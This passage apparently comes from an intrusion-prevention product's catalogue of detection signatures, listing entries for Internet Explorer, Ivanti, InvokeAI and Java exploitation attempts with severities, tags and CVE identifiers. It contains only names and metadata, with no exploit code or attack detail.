File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3117

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MS2013-06, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-526-5211
Vulnerability: Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3117
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3119

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MS2013-06, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-527-5211
Last changed: sgpkg-ips-527-5211
Vulnerability: Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3119
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3120

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MS2013-06, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-1589-5242
Vulnerability: Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3120
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3121

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MS2013-06, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-526-5211
Vulnerability: Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3121
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3122

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MS2013-06, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-526-5211
Vulnerability: Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3122
Description:
Back to top

File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3142

About this situation: A vulnerability in Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MS2013-06, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-527-5211
Last changed: sgpkg-ips-527-5211
Vulnerability: Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3142
Description:
Back to top

File-Text_Internet-Explorer-VML-Memory-Corruption-CVE-2013-0030

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-02, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-509-5211
Vulnerability: Internet-Explorer-VML-Memory-Corruption-CVE-2013-0030
Description:
Back to top

File-Text_Internet-Explorer-VML-Memory-Corruption-CVE-2013-0030-2

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-02, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-512-5211
Last changed: sgpkg-ips-512-5211
Vulnerability: Internet-Explorer-VML-Memory-Corruption-CVE-2013-0030
Description:
Back to top

File-Text_Internet-Explorer-Vulnerability-CVE-2016-0002

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2016-01, CVE2016, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-720-5211
Vulnerability: Internet-Explorer-Vulnerability-CVE-2016-0002
Description:
Back to top

File-Text_Internet-Shortcut-File-MHTML-URL-Prefix

About this situation: Internet Shortcut file with an mhtml prefix in the URL detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2024-07, CVE2024, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1752-5242
Last changed: sgpkg-ips-1752-5242
Vulnerability: Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-38112
Description:
Back to top

File-Text_Internet-Shortcut-File-Transfer

About this situation: Internet shortcut file transfer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1755-5242
Last changed: sgpkg-ips-1846-5242
Description:
Back to top

File-Text_Internet_Explorer_11_Buffer_Overrun_Vulnerability_CVE-2019-0666

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-03, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_11_Buffer_Overrun_Vulnerability_CVE-2019-0666
Description:
Back to top

File-Text_Internet_Explorer_11_Security_Bypass_Vulnerability_CVE-2019-0768

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-03, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_11_Security_Bypass_Vulnerability_CVE-2019-0768
Description:
Back to top

File-Text_Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0665

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-03, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0665
Description:
Back to top

File-Text_Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0667

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-03, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0667
Description:
Back to top

File-Text_Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0680

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-03, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0680
Description:
Back to top

File-Text_Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0763

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-03, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0763
Description:
Back to top

File-Text_Internet_Explorer_Arbitrary_Pointer_Dereference_Vulnerability_CVE-2019-0884

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-05, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1159-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Arbitrary_Pointer_Dereference_Vulnerability_CVE-2019-0884
Description:
Back to top

File-Text_Internet_Explorer_Integer_Overflow_Vulnerability_CVE-2019-0794

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-04, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Integer_Overflow_Vulnerability_CVE-2019-0794
Description:
Back to top

File-Text_Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2019-0752

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-04, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1349-5242
Vulnerability: Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2019-0752
Description:
Back to top

File-Text_Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2019-0753

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-04, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2019-0753
Description:
Back to top

File-Text_Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2021-26411

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2021-03, CVE2021, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1327-5242
Last changed: sgpkg-ips-1411-5242
Vulnerability: Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2021-26411
Description:
Back to top

File-Text_Internet_Explorer_Remote_Code_Execution_Vulnerability_CVE-2020-0968

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2020-04, CVE2020, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1241-5242
Last changed: sgpkg-ips-1241-5242
Vulnerability: Internet_Explorer_Remote_Code_Execution_Vulnerability_CVE-2020-0968
Description:
Back to top

File-Text_Internet_Explorer_Remote_Code_Execution_Vulnerability_CVE-2021-26419

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2021-05, CVE2021, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1347-5242
Last changed: sgpkg-ips-1347-5242
Vulnerability: Internet_Explorer_Remote_Code_Execution_Vulnerability_CVE-2021-26419
Description:
Back to top

File-Text_Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0824

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2020-03, CVE2020, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1229-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0824
Description:
Back to top

File-Text_Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0832

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2020-03, CVE2020, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1229-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0832
Description:
Back to top

File-Text_Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0833

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2020-03, CVE2020, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1229-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0833
Description:
Back to top

File-Text_Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0847

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2020-03, CVE2020, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1229-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0847
Description:
Back to top

File-Text_Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2021-34448

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2021-07, CVE2021, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1369-5242
Vulnerability: Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2021-34448
Description:
Back to top

File-Text_Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-0920

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-06, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-0920
Description:
Back to top

File-Text_Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-1238

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-10, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1195-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-1238
Description:
Back to top

File-Text_Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-1239

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-10, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1195-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-1239
Description:
Back to top

File-Text_Internet_Explorer_Type_Confusion_Vulnerability_CVE-2020-1216

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2020-06, CVE2020, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1256-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Type_Confusion_Vulnerability_CVE-2020-1216
Description:
Back to top

File-Text_Internet_Explorer_Type_Confusion_Vulnerability_CVE-2020-1230

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2020-06, CVE2020, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1256-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Type_Confusion_Vulnerability_CVE-2020-1230
Description:
Back to top

File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1035

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2020-05, CVE2020, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1249-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1035
Description:
Back to top

File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1060

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2020-05, CVE2020, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1249-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1060
Description:
Back to top

File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1062

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2020-05, CVE2020, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1249-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1062
Description:
Back to top

File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1213

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2020-06, CVE2020, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1256-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1213
Description:
Back to top

File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1214

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2020-06, CVE2020, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1256-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1214
Description:
Back to top

File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1215

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2020-06, CVE2020, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1256-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1215
Description:
Back to top

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0793

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-04, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0793
Description:
Back to top

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0862

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-04, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0862
Description:
Back to top

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0918

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-05, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1159-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0918
Description:
Back to top

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0930

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-05, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1159-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0930
Description:
Back to top

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0988

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-06, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0988
Description:
Back to top

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1005

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-06, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1005
Description:
Back to top

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1055

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-06, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1055
Description:
Back to top

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1060

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-10, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1195-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1060
Description:
Back to top

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1390

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-11, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1201-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1390
Description:
Back to top

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1429

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2019-11, CVE2019, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1201-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1429
Description:
Back to top

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2020-0674

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, CVE2020, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1217-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Use_After_Free_Vulnerability_CVE-2020-0674
Description:
Back to top

File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2020-1260

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2020-06, CVE2020, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1256-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Internet_Explorer_Use_After_Free_Vulnerability_CVE-2020-1260
Description:
Back to top

File-Text_Invalid-Style-Tag

About this situation: Detected Invalid Style Tag
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-437-4219
Description:
Back to top

File-Text_Invisible-Inline-Frame

About this situation: Detected a hidden inline frame
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic browser, Any Operating System not specific, Generic browser not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Invisible-Inline-Frame
Description:
Back to top

File-Text_InvokeAI-RCE

About this situation: An attempt to exploit a vulnerability in InvokeAI detected
Context: Text File Stream
Severity: 7
Tags: Linux, Any Hardware, InvokeAI, CVE2024, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1842-5242
Last changed: sgpkg-ips-1842-5242
Vulnerability: InvokeAI-RCE
Description:
Back to top

File-Text_Iseemedia-LPViewer-ActiveX-Control-Multiple-Methods-Buffer-Overflow

About this situation: An attempt to exploit buffer overflow vulnerability in iseemedia LPViewer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, iseemedia LPViewer, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-630-5211
Vulnerability: Iseemedia-LPViewer-ActiveX-Control-Multiple-Buffer-Overflows
Description:
Back to top

File-Text_Ivanti-Connect-Secure-Command-Injection-CVE-2024-21887

About this situation: An attempt to exploit a vulnerability in Ivanti Connect Secure detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Connect Secure, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1676-5242
Last changed: sgpkg-ips-1676-5242
Vulnerability: Ivanti-Connect-Secure-Command-Injection-CVE-2024-21887
Description:
Back to top

File-Text_Ivanti-Endpoint-Manager-ECustomDataForm-OnSaveToDB-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1858-5242
Last changed: sgpkg-ips-1858-5242
Vulnerability: Ivanti-Endpoint-Manager-ECustomDataForm-OnSaveToDB-Directory-Traversal
Description:
Back to top

File-Text_Java-Unsigned-Applet-Execution

About this situation: An attempt to exploit a vulnerability in Java Runtime Environment detected
Context: Text File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, CVE2010, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Java-Unsigned-Applet-Execution
Description:
Back to top

File-Text_JavaScript-ActiveX-Class-Id-Obfuscation

About this situation: Detected an obfuscated JavaScript ActiveX class ID
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-582-5211
Last changed: sgpkg-ips-582-5211
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_JavaScript-ActiveX-Obfuscation

About this situation: Obfuscated JavaScript ActiveX object instantiation detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
